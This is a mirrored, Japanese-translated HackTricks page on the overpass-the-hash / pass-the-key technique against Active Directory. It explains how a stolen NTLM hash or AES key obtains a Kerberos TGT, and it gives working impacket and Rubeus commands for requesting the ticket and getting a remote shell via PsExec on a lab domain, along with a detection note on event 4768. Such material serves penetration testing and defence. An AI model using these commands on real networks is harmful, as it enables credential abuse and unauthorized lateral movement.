Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
Translator workflow e90c803209 Translated to Japanese
2023-07-07 23:42:27 +00:00

6.2 KiB
Raw Blame History

オーバーパス・ザ・ハッシュ/パス・ザ・キー

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

オーバーパス・ザ・ハッシュ/パス・ザ・キーPTK

この攻撃は、一般的なNTLMプロトコルを介したパス・ザ・ハッシュの代わりに、ユーザーのNTLMハッシュまたはAESキーを使用してKerberosチケットを要求することを目的としています。したがって、これは特にNTLMプロトコルが無効化され、認証プロトコルとしてKerberosのみが許可されているネットワークで役立ちます。

この攻撃を実行するためには、対象のユーザーアカウントのNTLMハッシュまたはパスワードが必要です。したがって、ユーザーハッシュが取得されると、そのアカウントのTGTを要求することができます。最終的には、ユーザーアカウントに権限がある任意のサービスやマシンにアクセスすることが可能です。

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

次のようにして、-aesKey [AESキー]を指定してAES256を使用することができます。
また、smbexec.pyやwmiexec.pyなどの他のツールでもチケットを使用することができます。

問題の可能性:

  • PyAsn1Error'NamedTypes can cast only scalar values'impacketを最新バージョンに更新することで解決します。
  • KDCが名前を見つけられないKerberos KDCに認識されなかったため、IPアドレスの代わりにホスト名を使用することで解決します。
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

この種の攻撃はPass the Keyに似ていますが、チケットを要求するためにハッシュを使用する代わりに、チケット自体が盗まれ、所有者として認証されます。

{% hint style="warning" %} TGTが要求されると、イベント4768: A Kerberos authentication ticket (TGT) was requestedが生成されます。上記の出力からわかるように、KeyTypeはRC4-HMAC0x17ですが、Windowsのデフォルトタイプは現在AES2560x12です。 {% endhint %}

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

参考文献

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥